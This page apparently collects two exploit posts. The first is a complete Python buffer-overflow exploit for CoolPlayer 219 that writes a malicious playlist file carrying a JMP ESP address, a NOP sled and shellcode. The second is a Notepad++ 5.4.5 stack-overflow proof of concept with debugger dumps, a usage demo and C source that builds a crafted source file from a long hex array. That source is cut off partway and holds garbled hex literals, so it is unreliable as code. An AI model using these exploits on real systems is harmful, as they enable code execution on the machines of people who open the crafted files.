Aug 12

 

# #########################################################################
#~ Title         : CoolPlayer 219 Buffer Overflow Exploit  
#~ Software      : http://coolplayer.en.softonic.com/
#~ Tested on     : Windows XP SP3 English
#~ Date          : 04/07/2011
#~ Author        : X-h4ck
#~ Site          : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/
#~ Email         : mem001@live.com
#~ Greetz        : Wulns~ – IllyrianWarrior – Danzel – Ace – M4yh3m – Saldeath – bi0 – Slimshaddy – d3trimentaL – Lekosta – Pretorian – CroSs(r00tworm) – Rigon
# #########################################################################

#!/usr/bin/python
print " CoolPlayer 219 Buffer Overflow Exploit"
print " Author : X-h4ck"
print " www.pirate.al, http://theflashcrew.blogspot.com"
print " Wulns~ – IllyrianWarrior – Danzel – Ace – M4yh3m – Saldeath – bi0 – Slimshaddy – d3trimentaL – Lekosta – Pretorian – CroSs – Rigon"
print " // Aint no pussy made where we came from \\\ @PirateAL Crew"
print " "
print " "

filename = "PirateAL.m3u"

junk = "\x41" * 248
EIP = "\xDC\x3A\xB4\x76" # JMP ESP 0x76B43ADC winmm.dll
nopsled = "\x90" * 20
#calc.exe
shellcode = ("\x33\xc9\xb8\xa2\xe0\xe4\x44\xb1\x33\xda\xdf\xd9\x74\x24"
"\xf4\x5b\x31\x43\x0e\x03\x43\x0e\x83\x49\x1c\x06\xb1\x71"
"\x35\x4e\x3a\x89\xc6\x31\xb2\x6c\xf7\x63\xa0\xe5\xaa\xb3"
"\xa2\xab\x46\x3f\xe6\x5f\xdc\x4d\x2f\x50\x55\xfb\x09\x5f"
"\x66\xcd\x95\x33\xa4\x4f\x6a\x49\xf9\xaf\x53\x82\x0c\xb1"
"\x94\xfe\xff\xe3\x4d\x75\xad\x13\xf9\xcb\x6e\x15\x2d\x40"
"\xce\x6d\x48\x96\xbb\xc7\x53\xc6\x14\x53\x1b\xfe\x1f\x3b"
"\xbc\xff\xcc\x5f\x80\xb6\x79\xab\x72\x49\xa8\xe5\x7b\x78"
"\x94\xaa\x45\xb5\x19\xb2\x82\x71\xc2\xc1\xf8\x82\x7f\xd2"
"\x3a\xf9\x5b\x57\xdf\x59\x2f\xcf\x3b\x58\xfc\x96\xc8\x56"
"\x49\xdc\x97\x7a\x4c\x31\xac\x86\xc5\xb4\x63\x0f\x9d\x92"
"\xa7\x54\x45\xba\xfe\x30\x28\xc3\xe1\x9c\x95\x61\x69\x0e"
"\xc1\x10\x30\x44\x14\x90\x4e\x21\x16\xaa\x50\x01\x7f\x9b"
"\xdb\xce\xf8\x24\x0e\xab\xe7\xc6\x9b\xc1\x8f\x5e\x4e\x68"
"\xd2\x60\xa4\xae\xeb\xe2\x4d\x4e\x08\xfa\x27\x4b\x54\xbc"
"\xd4\x21\xc5\x29\xdb\x96\xe6\x7b\xb8\x79\x75\xe7\x11\x1c"
"\xfd\x82\x6d")

pwn = junk+EIP+nopsled+shellcode
FILE = open(filename, "w")
FILE.write(pwn)
FILE.close()
print " Evil File created succesully, time for pwnage"

Tagged with:
Sep 16

/*
**************************************************************
(0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC*
  by fl0 fl0w                                                *
************************************************************** 
*/

/*****************************************************************************************************
LATEST FIXES                                                                                         *
Notepad++ v5.4.5 fixed bugs (from v5.4.4) :                                                          *
1.  Fix plugins shortcuts not working bug.                                                           *
2.  Fix the tooltip on toolbar display bug for the plugins icons.                                    *
3.  Fix a crash that was occurring when searching in files from a deep path.                         *
4.  Fix a crash issue (Unicode binary) while close Notepad++ with an RC file opened under Chinese Xp.*
5.  Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml).                         * 
6.  Add SQL folding capacity.                                                                        *  
******************************************************************************************************
*/

/***************************************************************************
This is the latest version of notepad++.                                   *
As you can see no buffer overflow bug is mentioned to exist or to be fixed.*
****************************************************************************
*/

/***********************************************************
DEBUGGING INFORMATION                                      *
CPU REGISTERS                                              *
EAX 00000000                                               *
ECX 003B74C4                                               *
EDX 00000000                                               *
EBX 0999A999                                               *
ESP 000E0764                                               *
EBP 000E0834                                               *
ESI 00B3D760                                               *
EDI 003B74B0                                               *
EIP 1000A258 SciLexer.1000A258                             *
                                                           *
Function  SciLexer() is causing this bug.                  *
Let’s look at the assembly instructions:                   *
                                                           *
ASSEMBLY INSTRUCTIONS                                      *
1000A258   8910             MOV DWORD PTR DS:[EAX],EDX     *
1000A25A   8B45 F8          MOV EAX,DWORD PTR SS:[EBP-8]   *
1000A25D   8B80 60090000    MOV EAX,DWORD PTR DS:[EAX+960] *
1000A263   8B80 B0010000    MOV EAX,DWORD PTR DS:[EAX+1B0] *
1000A269   0FAF81 24060000  IMUL EAX,DWORD PTR DS:[ECX+624]*
1000A270   2055 FF          AND BYTE PTR SS:[EBP-1],DL     *
1000A273   8945 C0          MOV DWORD PTR SS:[EBP-40],EAX  *
1000A276   8B41 10          MOV EAX,DWORD PTR DS:[ECX+10]  *
1000A279   05 6C0B0000      ADD EAX,0B6C                   *
1000A27E   8945 CC          MOV DWORD PTR SS:[EBP-34],EAX  *
1000A281   33C0             XOR EAX,EAX                    *
1000A283   6A 1F            PUSH 1F                        *
1000A285   59               POP ECX                        *
                                                           *
EDX=00000000                                               *
DS:[00000000]=???                                          *
************************************************************
*/

/*************************************************************
STACK                                                        *
000BFEB4   004956A0  notepad+.004956A0                       *
000BFEB8   F74B257B                                          *
000BFEBC   FFFFFFFE                                          *
000BFEC0   58585858                                          *
000BFEC4   58585858                                          *
000BFEC8   58585858q                                         *
000BFECC   58585858                                          *
000BFED0   58585858                                          *
000BFED4   58585858                                          *
000BFED8   58585858                                          *
000BFEDC   58585858                                          *
000BFEE0   58585858                                          *
000BFEE4   58585858                                          *
000BFEE8   58585858                                          *
000BFEEC   58585858                                          *                                         
000BFEF4   58585858                                          *
000BFEF8   58585858                                          *
000BFEFC   58585858                                          *
000BFF00   58585858                                          *
000BFF04   58585858                                          *                                         
000BFF0C   58585858                                          *
000BFF10   58585858                                          *
……………………………….                          *
Tested succesfull on Microsoft Windows XP Service Pack 3.    *      
To test the exploit(notepad++.c) you need to compile it      *
with cygwin console or linux environment.                    *
If you want to test the executable(test.exe)you need to      *
copy the cygwin1.dll in the same folder as the executable.   *
Notepad++ 5.4.5 crashes in a STACK BUFFER OVERFLOW when a    *
specialy crafted .C/CPP file is opened.You can right click   *
the file and select ->edit with notepad++ or just click open.*
Compiled with cygwin console                                 *
For more debugging info (screenshots)                        *
Download the files from                                      *
http://rapidshare.com/files/280798297/notepad___POC.zip.html *
http://www.2shared.com/file/7836030/4bfaf50b/notepad_POC.html*
http://www.filehost.ro/557267/notepad_POC_zip/               * 
http://www.turboupload.com/1n8248ys8a15/notepad++_POC.zip.html
http://www.gigasize.com/get.php?d=c877pxt4pxb                *  
**************************************************************/

/*****************************************************************************************************************************
DEMO                                                                                                                         *  
I’m in the cygwin console                                                                                                    *
$gcc notepad++.c -o notepad                                                                                                  *
                                                                                                                             *
Now I want to run the .exe from                                                                                              *
CMD console so I copy the cygwin1.dll                                                                                        *
in my folder and run it.                                                                                                     *
                                                                                                                             *
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir                                                                   *
Volume in drive C is System                                                                                                 *
Volume Serial Number is A06E-304B                                                                                           *
                                                                                                                             *
Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC                                                         *
                                                                                                                             *
2009/09/16  01:13 PM    <DIR>          .                                                                                     *
2009/09/16  01:13 PM    <DIR>          ..                                                                                    *
2008/06/12  08:35 PM         1,872,884 cygwin1.dll                                                                           *
2009/09/14  03:09 PM       100,004,279 fffile.cpp                                                                            *
2009/09/16  01:13 PM            18,042 note.exe                                                                              *
2009/09/14  01:05 AM            12,317 NOTEPAD++ PLEASE READ.odt                                                             *
2009/09/16  01:11 PM            36,923 notepad++.c                                                                           *
2009/09/11  01:40 PM           192,747 screen1.JPG                                                                           *
2009/09/11  01:44 PM           224,376 screen2.JPG                                                                           *
2009/09/12  08:37 PM           443,304 screen3.JPG                                                                           *
               8 File(s)    102,804,872 bytes                                                                                *
               2 Dir(s)   4,864,954,368 bytes free                                                                           *
                                                                                                                             *
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe                                                              *
  *************************************************                                                                          *
Notepad++ 5.4.5 Stack Buffer Overflow                                                                                        *
Usage is:note [option1] filename                                                                                             *
CREDITS:fl0 fl0w                                                                                                             *
This POC is PRIVATE                                                                                                          *
*************************************************                                                                            *
Example:                                                                                                                     *
                                                                                                                             *
        -f       FILE.c/cpp                                                                                                  *
                                                                                                                             *
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>note.exe -f test.cpp                                                  *
FILE DONE !                                                                                                                  *
path/location of the crafted file is: /cygdrive/c/Documents and Settings/Stefan/                                             *
Desktop/notepad++ POC/                                                                                                       *
                                                                                                                             *
C:\Documents and Settings\Stefan\Desktop\notepad++ POC>dir                                                                   *
Volume in drive C is System                                                                                                 *
Volume Serial Number is A06E-304B                                                                                           *
                                                                                                                             *
Directory of C:\Documents and Settings\Stefan\Desktop\notepad++ POC                                                         *
                                                                                                                             *
2009/09/16  01:18 PM    <DIR>          .                                                                                     *
2009/09/16  01:18 PM    <DIR>          ..                                                                                    *
2008/06/12  08:35 PM         1,872,884 cygwin1.dll                                                                           *
2009/09/14  03:09 PM       100,004,279 fffile.cpp                                                                            *
2009/09/16  01:13 PM            18,042 note.exe                                                                              *
2009/09/14  01:05 AM            12,317 NOTEPAD++ PLEASE READ.odt                                                             *
2009/09/16  01:11 PM            36,923 notepad++.c                                                                           *
2009/09/11  01:40 PM           192,747 screen1.JPG                                                                           *
2009/09/11  01:44 PM           224,376 screen2.JPG                                                                           *
2009/09/12  08:37 PM           443,304 screen3.JPG                                                                           *
2009/09/16  01:18 PM       100,004,279 test.cpp     <————————–here you go now open it with notepad++ 5.4.5  *
               9 File(s)    202,809,151 bytes                                                                                *
               2 Dir(s)   4,746,797,056 bytes free                                                                           *
******************************************************************************************************************************              
*/
   #include "stdio.h"
   #include "string.h"
   #include "windows.h"
   #include "getopt.h"
   #include "stdint.h"
   #include <fcntl.h>
   #include <io.h>
   #define R 0×10
   #define RR 0x1F
   #define SS 0×80
   void CLS(int num_lines)
  {
  int n;
  for(n = 0; n < num_lines; n++)
  puts("");
  }

char checksum(char data[10000], char len)
    {
    uint32_t sum1 = 0xffff, sum2 = 0xffff;
    while (len) {
    unsigned tlen = len > 360 ? 360 : len;
    len -= tlen;
    do {
    sum1 += *data++;
    sum2 += sum1;
    } while (–tlen);
    sum1 = (sum1 & 0xffff) + (sum1 >> 16);
    sum2 = (sum2 & 0xffff) + (sum2 >> 16);
    }
    sum1 = (sum1 & 0xffff) + (sum1 >> 16);
    sum2 = (sum2 & 0xffff) + (sum2 >> 16);
    return sum2 << 16 | sum1;
    }
    void Buildfile(char *fname)
    {
     char V[] =
   { 
   0×20, 0×20, 0×20, 0×20, 0×23, 0×69, 0x6E, 0×63, 0x6C, 0×75, 0×64, 0×65, 0×20, 0x3C, 0×73, 0×74,
    0×64, 0×69, 0x6F, 0x2E, 0×68, 0x3E, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×23, 0×69, 0x6E, 0×63,
    0x6C, 0×75, 0×64, 0×65, 0×20, 0x3C, 0×77, 0×69, 0x6E, 0×64, 0x6F, 0×77, 0×73, 0x2E, 0×68, 0x3E,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×23, 0×69, 0x6E, 0×63, 0x6C, 0×75, 0×64, 0×65, 0×20, 0x3C,
    0×73, 0×74, 0×72, 0×69, 0x6E, 0×67, 0x2E, 0×68, 0x3E, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×23,
    0×69, 0x6E, 0×63, 0x6C, 0×75, 0×64, 0×65, 0×20, 0x3C, 0×67, 0×65, 0×74, 0x6F, 0×70, 0×74, 0x2E,
    0×68, 0x3E, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×23, 0×69, 0x6E, 0×63, 0x6C, 0×75, 0×64, 0×65,
    0×20, 0x3C, 0×73, 0×74, 0×64, 0×69, 0x6E, 0×74, 0x2E, 0×68, 0x3E, 0x0D, 0x0A, 0×20, 0×20, 0×20,
    0×20, 0×74, 0×79, 0×70, 0×65, 0×64, 0×65, 0×66, 0×20, 0×73, 0×74, 0×72, 0×75, 0×63, 0×74, 0×20,
    0×53, 0×74, 0×61, 0×72, 0×74, 0×20, 0×20, 0x7B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×75, 0×69,
    0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×68, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×75,
    0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×74, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20,
    0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0x6D, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20,
    0×20, 0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0x6C, 0x3B, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x7D, 0×48, 0×54, 0x4D, 0x4C, 0x3B, 0x0D, 0x0A,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×74, 0×79, 0×70, 0×65, 0×64, 0×65, 0×66, 0×20, 0×73, 0×74,
    0×72, 0×75, 0×63, 0×74, 0×20, 0x4D, 0×69, 0×64, 0×64, 0x6C, 0×65, 0×20, 0x7B, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×68, 0x3B, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×65, 0x3B, 0×20,
    0×20, 0×20, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74,
    0×20, 0×73, 0×61, 0x3B, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×75,
    0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×64, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×09, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×09, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0x7D, 0×48, 0×45, 0×41, 0×44, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×74, 0×79, 0×70, 0×65, 0×64, 0×65, 0×66, 0×20, 0×73, 0×74,
    0×72, 0×75, 0×63, 0×74, 0×20, 0×45, 0x6E, 0×64, 0×20, 0×20, 0×20, 0×20, 0x7B, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×62, 0x3B, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0x6F, 0x3B, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×44, 0x3B,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×75, 0×69, 0x6E, 0×74, 0×38, 0x5F, 0×74, 0×20, 0×73, 0×79,
    0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x7D, 0×42, 0x4F,
    0×44, 0×59, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×23, 0×64, 0×65, 0×66, 0×69, 0x6E, 0×65,
    0×20, 0×42, 0×55, 0×46, 0×46, 0×45, 0×52, 0×53, 0×49, 0x5A, 0×45, 0×20, 0×20, 0×30, 0×78, 0×31,
    0×41, 0×30, 0×41, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×23, 0×64, 0×65, 0×66, 0×69, 0x6E, 0×65,
    0×20, 0×46, 0×49, 0x4C, 0×45, 0×53, 0×49, 0x5A, 0×45, 0×20, 0×20, 0×20, 0×20, 0×32, 0×39, 0×41,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×23, 0×64, 0×65, 0×66, 0×69, 0x6E, 0×65, 0×20, 0×53, 0×52,
    0×43, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×22, 0x3C, 0×69, 0x6D, 0×67, 0×20,
    0×73, 0×72, 0×63, 0x3D, 0×22, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×76, 0x6F, 0×69, 0×64, 0×20,
    0×46, 0×62, 0×75, 0×69, 0x6C, 0×64, 0×28, 0×63, 0×68, 0×61, 0×72, 0×20, 0x2A, 0×66, 0x6E, 0×61,
    0x6D, 0×65, 0×29, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0x7B, 0×20, 0×48, 0×54, 0x4D, 0x4C, 0×20,
    0x2A, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×48,
    0×45, 0×41, 0×44, 0×20, 0x2A, 0×68, 0×65, 0x5F, 0×61, 0×64, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×42, 0x4F, 0×44, 0×59, 0×20, 0x2A, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0x3B, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×63, 0×68, 0×61, 0×72, 0×20, 0x2A, 0x6D, 0×65, 0x6D,
    0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x2F,
    0x2F, 0×22, 0x5C, 0×78, 0×34, 0×38, 0x5C, 0×78, 0×35, 0×34, 0x5C, 0×78, 0×34, 0×44, 0x5C, 0×78,
    0×34, 0×43, 0×22, 0×20, 0×20, 0x2D, 0×68, 0×74, 0x6D, 0x6C, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0×20, 0x3D, 0×20, 0×28, 0×48, 0×54, 0x4D, 0x4C, 0x2A,
    0×29, 0x6D, 0×61, 0x6C, 0x6C, 0x6F, 0×63, 0×28, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×48,
    0×54, 0x4D, 0x4C, 0×29, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×68, 0×65,
    0x5F, 0×61, 0×64, 0×20, 0x3D, 0×20, 0×28, 0×48, 0×45, 0×41, 0×44, 0x2A, 0×29, 0x6D, 0×61, 0x6C,
    0x6C, 0x6F, 0×63, 0×28, 0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×48, 0×45, 0×41, 0×44, 0×29,
    0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0×20,
    0x3D, 0×20, 0×28, 0×42, 0x4F, 0×44, 0×59, 0x2A, 0×29, 0x6D, 0×61, 0x6C, 0x6C, 0x6F, 0×63, 0×28,
    0×73, 0×69, 0x7A, 0×65, 0x6F, 0×66, 0×28, 0×42, 0x4F, 0×44, 0×59, 0×29, 0×29, 0x3B, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0×20,
    0x3D, 0×20, 0×28, 0×63, 0×68, 0×61, 0×72, 0x2A, 0×29, 0x6D, 0×61, 0x6C, 0x6C, 0x6F, 0×63, 0×28,
    0×42, 0×55, 0×46, 0×46, 0×45, 0×52, 0×53, 0×49, 0x5A, 0×45, 0×29, 0x3B, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×69, 0×66, 0×28, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0×20, 0x3D, 0x3D, 0×20,
    0x4E, 0×55, 0x4C, 0x4C, 0×20, 0x7C, 0x7C, 0×20, 0×68, 0×65, 0x5F, 0×61, 0×64, 0×20, 0x3D, 0x3D,
    0×20, 0x4E, 0×55, 0x4C, 0x4C, 0×20, 0x7C, 0x7C, 0×20, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0×20, 0x3D,
    0x3D, 0×20, 0x4E, 0×55, 0x4C, 0x4C, 0×20, 0x7C, 0x7C, 0×20, 0x6D, 0×65, 0x6D, 0×42, 0×75, 0×66,
    0×66, 0×65, 0×72, 0×20, 0x3D, 0x3D, 0×20, 0x4E, 0×55, 0x4C, 0x4C, 0×29, 0×20, 0x7B, 0×20, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×65, 0×78, 0×69, 0×74, 0×28, 0x2D, 0×31, 0×29, 0x3B,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0x7D, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0x2D,
    0x3E, 0×73, 0×68, 0×20, 0x3D, 0×20, 0×30, 0×78, 0×34, 0×38, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0×73, 0×74, 0×20, 0x3D, 0×20, 0×30,
    0×78, 0×35, 0×34, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×68, 0×74, 0x5F, 0x6D,
    0x6C, 0x2D, 0x3E, 0×73, 0x6D, 0×20, 0x3D, 0×20, 0×30, 0×78, 0×34, 0×44, 0x3B, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×68, 0×74, 0x5F, 0x6D, 0x6C, 0x2D, 0x3E, 0×73, 0x6C, 0×20, 0x3D,
    0×20, 0×30, 0×78, 0×34, 0×43, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x2F, 0x2F,
    0×73, 0×65, 0×63, 0x6F, 0x6E, 0×64, 0×20, 0×73, 0×74, 0×72, 0×75, 0×63, 0×74, 0×75, 0×72, 0×65,
    0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x2F, 0x2F, 0×48, 0×45, 0×41, 0×44, 0×20, 0×22,
    0x5C, 0×78, 0×34, 0×38, 0x5C, 0×78, 0×34, 0×35, 0x5C, 0×78, 0×34, 0×31, 0x5C, 0×78, 0×34, 0×34,
    0×22, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×68, 0×65, 0x5F, 0×61, 0×64, 0x2D, 0x3E,
    0×73, 0×68, 0×20, 0x3D, 0×20, 0×30, 0×78, 0×34, 0×38, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×68, 0×65, 0x5F, 0×61, 0×64, 0x2D, 0x3E, 0×73, 0×65, 0×20, 0x3D, 0×20, 0×30, 0×78,
    0×34, 0×35, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×68, 0×65, 0x5F, 0×61, 0×64,
    0x2D, 0x3E, 0×73, 0×61, 0×20, 0x3D, 0×20, 0×30, 0×78, 0×34, 0×31, 0x3B, 0x0D, 0x0A, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×68, 0×65, 0x5F, 0×61, 0×64, 0x2D, 0x3E, 0×73, 0×64, 0×20, 0x3D, 0×20,
    0×30, 0×78, 0×34, 0×34, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x2F, 0x2F, 0×74,
    0×68, 0×69, 0×65, 0×72, 0×64, 0×20, 0×73, 0×74, 0×72, 0×75, 0×63, 0×74, 0×75, 0×72, 0×65, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x2F, 0x2F, 0×22, 0x5C, 0×78, 0×34, 0×32, 0x5C, 0×78,
    0×34, 0×46, 0x5C, 0×78, 0×34, 0×34, 0x5C, 0×78, 0×35, 0×39, 0×22, 0x0D, 0x0A, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0x2D, 0x3E, 0×73, 0×62, 0×20, 0x3D, 0×20, 0×30,
    0×78, 0×34, 0×32, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×62, 0x6F, 0x5F, 0×64,
    0×79, 0x2D, 0x3E, 0×73, 0x6F, 0×20, 0x3D, 0×20, 0×30, 0×78, 0×34, 0×46, 0x3B, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×62, 0x6F, 0x5F, 0×64, 0×79, 0x2D, 0x3E, 0×73, 0×44, 0×20, 0x3D,
    0×20, 0×30, 0×78, 0×34, 0×34, 0x3B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×62, 0x6F,
    0x5F, 0×64, 0×79, 0x2D, 0x3E, 0×73, 0×79, 0×20, 0x3D, 0×20, 0×30, 0×78, 0×35, 0×39, 0x3B, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×46, 0×49, 0x4C, 0×45, 0×20, 0x2A, 0×66, 0x3B, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×66, 0×20, 0x3D, 0×20, 0×66, 0x6F, 0×70, 0×65, 0x6E,
    0×28, 0×66, 0x6E, 0×61, 0x6D, 0×65, 0x2C, 0×20, 0×22, 0×77, 0×22, 0×29, 0x3B, 0x0D, 0x0A, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×69, 0×66, 0×28, 0×20, 0×66, 0×20, 0x3D, 0x3D, 0×20, 0x4E, 0×55,
    0x4C, 0x4C, 0×29, 0×20, 0x7B, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×65, 0×78, 0×69,
    0×74, 0×28, 0x2D, 0×31, 0×29, 0x3B, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x7D, 0x0D,
    0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×69, 0x6E, 0×74, 0×33, 0×32, 0x5F, 0×74, 0×20, 0x6F,
    0×66, 0×66, 0×73, 0×65, 0×74, 0×20, 0x3D, 0×20, 0×30, 0x3B, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x0D, 0x0A,
    0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6D, 0×65, 0x6D, 0×63, 0×70, 0×79, 0×28, 0x6D, 0×65, 0x6D,
    0×42, 0×75, 0×66, 0×66, 0×65, 0×72, 0x2C, 0×20, 0×22, 0x3C, 0×22, 0x2C, 0×20, 0×31, 0×29, 0x3B,
    0×20, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20, 0x6F, 0×66, 0×66, 0×73, 0×65, 0×74,
    0×20, 0x2B, 0x3D, 0×20, 0×31, 0x3B, 0×20, 0×20, 0x0D, 0x0A, 0×20, 0×20, 0×20, 0×20, 0×20, 0×20,
